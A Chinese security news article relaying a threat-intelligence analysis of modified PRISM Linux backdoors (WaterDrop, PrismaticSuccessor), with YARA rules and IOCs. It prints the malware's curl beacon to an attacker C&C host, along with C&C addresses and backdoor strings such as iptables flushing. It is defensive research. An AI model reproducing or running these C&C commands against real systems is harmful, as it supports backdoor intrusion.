51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

潜伏四年,利用PRISM后门的攻击者

作者:Avenger
安全 网站安全
安全研究人员最近发现了一组隐蔽性极强的 ELF 可执行文件,它们在 VirusTotal 上的杀软检出率很低或为零。

[[425063]]

AT&T 的安全研究人员最近发现了一组隐蔽性极强的 ELF 可执行文件,它们在 VirusTotal 上的杀软检出率很低或为零。在分析样本后,AT&T 已将它们确定为多个攻击者在多次攻击行动中使用的开源 PRISM 后门的修改版。

深入分析了使用这些恶意软件的攻击活动,在长达三年半的时间内这些攻击者仍然保持活跃。最早的攻击行动中的样本出现在 2017 年 11 月 8 日。

WaterDrop 分析

WaterDrop 的变种很容易识别,它包含一个名为 xencrypt的函数,该函数使用硬编码的单字节 0x1F密钥执进行异或加密。从 WaterDrop 变种的第 7 版开始,恶意样本也包含纯文本字符串 WaterDropx vX started,其中 X 是恶意样本的版本号。到目前为止,已经观察到版本 1、2.2 和 3 使用 PRISM 命名,而版本 7、9 和 12 被命名为 WaterDropx。

WaterDrop 使用 agent-waterdropx作为 User-Agent 进行 HTTP 协议的 C&C 通信,C&C 使用 waterdropx.com 域名的子域名。

尽管这些都是非常明显的特征,但攻击者仍然保持了在 VirusTotal 上极低的检出率,这可能是因为攻击行动的规模较小。

攻击者在 2017 年 8 月 18 日注册 waterdropx.com 域名。截至 2021 年 8 月 10 日,该域名仍在使用。

除了 PRISM 的基本功能外,WaterDrop 还额外引入了异或加密与定期轮询 C&C 服务器的功能。

恶意软件与 C&C 服务器的通信是纯文本 HTTP 协议,且所有版本的恶意软件都使用了 agent-waterdropx作为 User-Agent。

一些变种还会在以 root 权限执行时加载内核模块。

版本进化

(1) PRISM v1

第一个版本的样本就是使用 waterdropx.com 作为 C&C 域名的攻击者使用的,他们的 User-Agent 相同。

与公开的 PRISM 相比,该版本创建了子进程,该子进程不断向 C&C 服务器轮询要执行的命令。

  1. curl -A 'agent-waterdropx' 'http://r.waterdropx.com:13858/tellmev2.x?v=1&act=touch

第一个版本的样本没有对恶意样本进行任何混淆、加壳或者加密。

(2) PRISM v2.2

2.2 版本的 PRISM 开始使用异或加密来处理敏感数据,例如使用的 shell 命令等。单字节密钥硬编码为 0x1F,该密钥用于发现同一攻击者的所有样本。

对于这个版本的恶意软件,初始的 C&C URI 请求格式是:

  1. /tellmev2.x?v=2.2&act=touch 

(3) PRISM v3

3 版本的 PRISM 与 2.2 版本基本相同,额外多了 BOT ID 被保存到 /etc/.xid。

初始请求格式为:

  1. /tellmev2.x?v=3&act=touch&xid

(4) PRISM v7

Waterdrop v7 引入了内核模块的使用,如果进程具有 root 权限,则使用 insmod 安装。安全分析人员暂时无法确定此 Payload 的用途。

其余代码与 PRISM v3 相同,仅更改了硬编码版本号。其初始请求格式为:

  1. /tellmev2.x?v=7&act=touch&xid

(5) PRISM v9

延续之前版本的风格,Waterdrop v9 的变化微乎其微。在这个版本中发现的唯一变化是,使用 BOT ID 作为 ICMP 密码来生成反向 Shell,而不是使用硬编码的 ICMP 密码。

初始请求格式为:

  1. /tellmev2.x?v=9&act=touch&xid

(6) PRISM v12

Waterdrop v12 与其前序版本几乎相同,但增强了后门的稳定性。

其初始请求格式为:

  1. /tellmev2.x?v=12&act=touch&xid

恶意软件家族 PrismaticSuccessor

域名 z0gg.me 可解析为由另外 12 个域名共享的 IP 地址。

一些存在重叠的域名是已知的 PRISM 的 C&C 域名,但 z0gg.me 也与几个其他恶意样本存在关联。特别是,观察到与 https://github.com/lirongchun/i存储库有关。

在这个存储库中,可以观察到以下文件:

(1)三个包含 IP 地址(README.md)和端口号(README1.md 和 MP.md)的文档

(2)针对脏牛(CVE-2016-5195)漏洞的 Bash 脚本,名为:111

(3)几个 ELF 二进制文件,包括:

  • git:自定义恶意软件植入工具
  • ass:为 x64 架构编译的名为hide my ass的开源安全工具
  • ass32:为 x86 架构编译的名为hide my ass的开源安全工具

由于攻击者使用公共 GIT 存储库来托管其恶意软件和基础设施信息,可以查看历史数据观察其演变。

例如,我们可以使用以下命令收集参与者用作 C&C 服务器的所有 IP 地址:

  1. $ git log -p README.md |grep "^+"|grep -v "+++ 
  2. +45.199.88[.]86 
  3. +154.48.227[.]27 
  4. +207.148.118[.]141 
  5. +154.48.227[.]27 
  6. +165.22.136[.]80 
  7. +154.48.227[.]27 
  8. +156.236.110[.]79 
  9. +43.230.11[.]125 
  10. +172.247.127[.]136 
  11. +127.0.0[.1] 
  12. +192.168.3[.]173 
  13. +192.168.3[.]173:80 
  14. +192.168.3[.]173 
  15. +118.107.180[.]8 
  16. +s.rammus[.]me 
  17. +s.rammus[.]me:80 
  18. +192.168.3[.]150:80 
  19. +192.168.3[.]150^80 
  20. +192.168.3[.]150^ 
  21. +^192.168.3[.]150 
  22. +^192.168.3[.]133 
  23. $ shasum -a 256 * 
  24. 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657  MP.out 
  25. f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188  git 
  26. eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d  git (1) 
  27. 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a  git (2) 
  28. 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8  git (3) 
  29. cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824  git (4) 
  30. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531  git (5) 
  31. eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f  git443 
  32. d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278  git53 
  33. 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63  gitest 
  34. 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017  hostname 
  35. 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473  ps 
  36. 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a  wm 
  37. 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46  wm (1) 
  38. e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4  wm32 
  39. b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920  wmgithub 

按大小进行分组,可以发现大约 15K 的样本是 PRISM 后门,而大约 1.1 MB 的样本是另外的恶意软件。

攻击者在 2019 年 7 月 16 日提交了自定义 implant,该恶意软件使用修改版的 UPX 加壳。

恶意软件明显变大是由于二进制文件静态编译进了 libcurl,AT&T 将这个恶意软件家族命名为 PrismaticSuccessor。

分析可知,配置由两个 URL 组成:

  • HostUrl 用于获取 C&C 主机
  • PortUrl 用于获取端口号

执行后会尝试加锁 /var/lock/sshd.lock来当作互斥量。

接下来,恶意软件解密包含进程名称的字符串,该字符串用于覆盖 argv。

请注意,aMcwfkvf 变量包含 [mcwfkvf]值,该值在 src中被解密为 [kauditd]。解密使用 ROT13,密钥为 -2。这个 ROT13 只处理大小字母,不处理符号和数字。

接下来,恶意软件通过子进程进行多任务处理。

某个子进程会打开一个硬编码 C&C 服务器的反向 Shell 会话,配置中最多有三个 C&C 地址(z0gg.me、x63.in 和 x47.in)并使用 ROT13 加密。

服务器还需要使用密码进行回复,以便成功建立反向 Shell。恶意软件会计算回复缓冲区的 MD5 哈希值,并将其与硬编码值 ef4a85e8fcba5b1dc95adaa256c5b482进行比较。

无论主 C&C 服务器是否成功联系,都会进行通信。

某个子进程通过 GitHub 获取 C&C 主机和端口,并打开反向 Shell。

生成 Shell 的函数与 PRISM 源代码很相似,但不完全相同。

某个子进程跳转到 Shellcode 异或解密,硬编码的 8 字节密钥:

构建的命令如下所示:

在 StackOverflow 上也能发现有用户抱怨被攻击,与之相符。

其他变种

我们也观察到其他攻击者使用 PRISM 后门进行攻击。然而,在大多数情况下,攻击者者会原样使用原始的 PRISM 后门,而不进行任何重大修改。某种程度上说,这也阻碍了我们正确跟踪攻击者的攻击行动。

结论

PRISM 是一个开源的、简单的后门。它的流量是清晰可辨的,恶意文件很容易被检测到。其 C&C 服务器已经保持在线长达三年半。这表明,虽然受到更多关注的大型攻击行动通常会在数小时内被检测到,但较小的攻击行动可能会被漏掉。

检测方法

  1. rule PrismaticSuccessor : LinuxMalware 
  3. meta: 
  4. author = "AlienLabs" 
  5. description = "Prismatic Successor malware backdoor" 
  6. reference = "aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5" 
  7. copyright = "Alienvault Inc. 2021" 
  8. strings: 
  9. $s1 = "echo -e \"
  10. $s2 = "[\x1B[32m+\x1B[0m]`/bin/hostname`" 
  11. $s3 = "[\x1B[32m+\x1B[0m]`/usr/bin/id`" 
  12. $s4 = "[\x1B[32m+\x1B[0m]`uname -r`" 
  13. $s5 = "[+]HostUrl->\t%s\n" 
  14. $s6 = "[+]PortUrl->\t%s\n" 
  15. $s7 = "/var/run/sshd.lock" 
  16. $shellcode = { 
  17. 48 31 C9 
  18. 48 81 E9 [4] 
  19. 48 8D 05 [4] 
  20. 48 BB [8] 
  21. 48 31 [2] 
  22. 48 2D [2-4] 
  23. E2 F4 
  25. $c1 = { 
  26. 8B 45 ?? 
  27. BE 00 00 00 00 
  28. 89 C7 
  29. E8 [4] 
  30. 8B 45 ?? 
  31. BE 01 00 00 00 
  32. 89 C7 
  33. E8 [4] 
  34. 8B 45 ?? 
  35. BE 02 00 00 00 
  36. 89 C7 
  37. E8 [4] 
  38. 8B 45 ?? 
  39. BA [4] 
  40. BE [4] 
  41. 89 C7 
  42. E8 
  44. condition: 
  45. uint32(0) == 0x464C457F and 
  46. filesize > 500KB and filesize < 5MB and 
  47. 5 of ($s*) and 
  48. all of ($c*) and 
  49. #shellcode == 2 
  51. rule PRISM { 
  52. meta: 
  53. author = "AlienLabs" 
  54. description = "PRISM backdoor" 
  55. reference = "https://github.com/andreafabrizi/prism/blob/master/prism.c" 
  56. strings: 
  57. $s1 = "I'm not root :(" 
  58. $s2 = "Flush Iptables:\t" 
  59. $s3 = " Version:\t\t%s\n" 
  60. $s4 = " Shell:\t\t\t%s\n" 
  61. $s5 = " Process name:\t\t%s\n" 
  62. $s6 = "iptables -F 2> /dev/null" 
  63. $s7 = "iptables -P INPUT ACCEPT 2> /dev/null" 
  64. $s8 = " started\n\n# " 
  65. $c1 = { 
  66. E8 [4] 8B 45 ?? BE 00 00 00 00 89 C7 E8 [4] 8B 45 ?? BE 01 00 00 00 
  67. 89 C7 E8 [4] 8B 45 ?? BE 02 00 00 00 89 C7 E8 [4] BA 00 00 00 00 
  68. BE [4] BF [4] B8 00 00 00 00 E8 
  70. $c2 = { 
  71. BA 00 00 00 00 
  72. BE 01 00 00 00 
  73. BF 02 00 00 00 
  74. E8 [4] 
  75. 89 45 [1] 
  76. 83 ?? ?? 00 
  78. condition: 
  79. uint32(0) == 0x464C457F and 
  80. filesize < 30KB and 
  81. (4 of ($s*) or all of ($c*)) 

IOC

  1. 05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8 
  2. 0af3e44967fb1b8e0f5026deb39852d4a13b117ee19986df5239f897914d9212 
  3. 0f42b737e30e35818bbf8bd6e58fae980445f297034d4e07a7e62a606d219af8 
  4. 0fba35856fadad942a59a90fc60784e6cceb1d8002af96d6cdf8e8c3533025f7 
  5. 342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd 
  6. 3a3c701e282b7934017-dadc33d95e0cc57e43a124f14d852f39c2657e0081683 
  7. 5999c1a4a281a853378680f20f6133e53c7f6d0167445b968eb49b844f37eab5 
  8. 98fe5ed342da2b5a9d206e54b5234cfeeed35cf74b60d48eb0ef3dd1d7d7bd59 
  9. a8c68661d1632f3a55ff9b7294d7464cc2f3ece63a782c962f1dc43f0f968e33 
  10. af55b76d6c3c1f8368ddd3f9b40d1b6be50a2b97b25985d2dde1288ceab9ff24 
  11. b6844ca4d1d7c07ed349f839c861c940085f1a30bbc3fc4aad0b496e8d492ce0 
  12. b8215cafbea9c61df8835a3d52c40f9d2c6a37604dd329ef784e9d92bad1f30f 
  13. b8cceb317a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2 
  14. be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0 
  15. c679600b75c6e84b53f4e6e21f3acbec1621c38940c8f3756d0b027c7a058d9c 
  16. c802fa50409edf26e551ee0d134180aa1467a4923c759a2d3204948e14a52f12 
  17. c8525243a68cba92521fb80a73136aaa19794b4772c35d6ecfec0f82ecad5207 
  18. d3fa1155810be25f9b9a889ee64f845fc6645b2b839451b59cfa77bbc478531f 
  19. dd5f933598184426a626d261922e1e82cb009910c25447b174d46e9cac3d391a 
  20. e14d75ade6947141ac9b34f7f5743c14dbfb06f4dfb3089f82595d9b067e88c2 
  21. f126c4f8b4823954c3c69121b0632a0e2061ef13feb348eb81f634379d011913 
  22. 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657 
  23. aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5 
  24. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531 
  25. f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188 
  26. eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d 
  27. 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a 
  28. 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8 
  29. cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824 
  30. baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531 
  31. eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f 
  32. d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278 
  33. 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63 
  34. 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017 
  35. 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473 
  36. 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a 
  37. 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46 
  38. e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4 
  39. b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920 
  40. 457467.com 
  41. zzz.457467.com 
  42. rammus.me 
  43. s.rammus.me 
  44. sw.rammus.me 
  45. wa1a1.com 
  46. www.wa1a1.com 
  47. waterdropx.com 
  48. r.waterdropx.com 
  49. spmood222.mooo.com 
  50. z0gg.me 
  51. x63.in 
  52. x47.in 
  53. 45.199.88.86 

 

责任编辑:赵宁宁 来源: FreeBuf
PRISM后门攻击
相关推荐
攻击者利用废弃WordPress插件,对网站进行后门攻击
攻击者正在使用EvalPHP,一个过时的WordPress插件,通过注入隐蔽的后门来破坏网站。

2023-04-21 19:01:55

攻击者部署后门,窃取Exchange电子邮件
在每一个UNC3524受害者环境中,攻击者都会针对一个子集的邮箱,集中其注意力在执行团队和从事企业发展、兼并和收购的员工或IT安全人员身上。

2022-05-05 16:24:21

APT网络攻击后门
攻击者利用LinkedIn针对求职进行钓鱼攻击
网络安全专家认为,虽然我不相信这将会损害LinkedIn的形象,但这确实让人们看到了电子邮件钓鱼的危害性,由于这些电子邮件都来自合法的LinkedIn电子邮件地址,因此特别难以识别危险性。

2022-03-05 12:00:11

网络钓鱼网络攻击
APT攻击者是如何利用HTML注释攻击
你有没有想过高级持续性攻击(APT)者究竟为什么如此难以检测到?因为这些高级持续性威胁(APT)攻击者使用的是目标主机上现有的工具,通过常用网络端口,并将他们的命令控制(C&C)通信隐藏在HTML注释中。

2011-08-30 09:39:10

攻击者利用BlackEnergy销毁磁盘文件
Eset公司安全威胁主管AntonCherepanov指出,恶意软件编写者们正利用BlackEnergy木马的新型KillDisk组件对乌克兰境内多个未知机构进行攻击,且总计销毁了约4000种不同类型文件并导致相关设备无法重启。

2016-01-05 15:54:32

攻击者利用SSL进行加密攻击和通信
该公司名为《加密攻击现状》的年度报告称,通过加密恶意软件客户端与命令和控制服务器之间的连接,网络犯罪分子能够逃避网络安全设备和软件的检测。

2021-11-04 05:48:43

SSL加密攻击勒索软件
提高攻击者攻击成本
作为美国西雅图市的首席信息安全官,Hamilton的责任延伸到各种其他部门的网络,例如该市的警察和消防部门。为了保护这些网络,Hamilton不仅需要专注于防御,还需要能给攻击者制造障碍。

2014-08-20 09:44:57

攻击者利用微软Exchange漏洞攻击全球酒店,持续三
ESET发现黑客组织,自2019年以来,一直将目标对准世界各地的酒店,以及政府、国际组织、律师事务所和工程公司等知名目标。

2021-09-26 05:44:07

漏洞攻击黑客
NSA后门可让攻击者轻松解密HTTPS、VPN加密流量
研究人员发明了一种新办法,可以在使用加密体系保护的网站、VPN和互联网服务器中放入不被检测的后门,这一壮举使得黑客可以轻松解密数以亿计的加密通信和密钥。这一技术最引人注目的地方就是它将一个后门程序(也可以说是“陷阱”)放在了Diffiehellman密钥交换所使用的1024位密钥中。

2016-10-17 09:20:20

攻击者利用谷歌文档评论功能进行攻击
研究人员说,12月发现的一波主要针对Outlook用户的网络钓鱼攻击,电子邮件扫描器和受害者都很难分辨邮件信息的真假。

2022-02-13 23:12:34

网络钓鱼谷歌Google
企业如何防范攻击者利用多个零日攻击
本文主要向大家介绍了企业应如何防范攻击者利用多个零日攻击的方法和原理,希望大家能够通过以下的介绍有所收获。

2011-05-16 09:19:51

攻击者利用Citrix NetScaler设备漏洞,放大DDoS攻击
Citrix发布了一份紧急警告,通知客户,某些受到影响的NetScaler应用程序的交付控制器(ADC)设备出现了安全问题,攻击者正利用该问题对多个目标发动大规模分布式拒绝服务(DDoS)攻击。

2020-12-30 09:27:55

漏洞DDoS攻击网络攻击
攻击者利用Kopeechka创建大量账户发起大规模攻击
本文将介绍Kopeechka服务,并对该服务的特性和功能进行详细的技术分析,以及它如何帮助攻击者实现其目标。

2023-11-22 15:17:54

攻击者利用DNSpooq劫持百万台以上设备
据外媒,以色列安全咨询企业JSOF在最新的报告中披露了7个Dnsmasq漏洞,并指出攻击者通过漏洞劫持了数百万台设备。

2021-01-21 11:36:20

漏洞DNSpooq网络攻击
攻击者已然开始利用Bash安全漏洞
攻击者们正在为前些日子公布的“Shellshock”Bash安全漏洞反复编写漏洞利用程序,这使得企业迅速修复该漏洞变得极其紧迫。

2014-10-08 09:25:30

攻击者如何瞄准和利用社交网络用户
在本篇文章中,我们将探讨工作场所使用社交网络带来的安全问题,以及如何解决这些问题。

2013-09-11 19:45:20

近几年攻击者利用Docker API错误配置进行攻击
该攻击活动利用了配置错误的DockerAPIs来获取入侵内部网络的入口,并最终在被攻击的主机上设置后门,挖掘加密货币。

2022-01-04 11:58:49

Docker API网络攻击文件加密
攻击者利用 Telerik 漏洞部署 Cobalt Strike
攻击者利用的漏洞是CVE201918935,这是一个严重的反序列化漏洞,CVSSv3.1评分高达9.8,可导致在TelerikUI库中远程执行ASP.NETAJAX的代码。

2022-06-16 11:02:21

漏洞攻击
FBI称攻击者利用Mega.nz发起勒索攻击
受疫情影响,在企业加速推进云端迁移的过程中,犯罪分子将钓鱼电子邮件隐藏到微软和Google的各项服务中,来达到窃取用户数据、勒索用户等目的。

2021-06-02 10:51:44

勒索软件攻击数据泄露
BillQuick计费软件被攻击者利用进行勒索软件攻击
由于BillQuick计费应用程序中存在一个SQL注入漏洞,该漏洞不仅泄露了用户的敏感信息,还允许恶意攻击者执行代码和部署勒索软件。

2021-11-11 12:03:37

勒索软件攻击漏洞
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服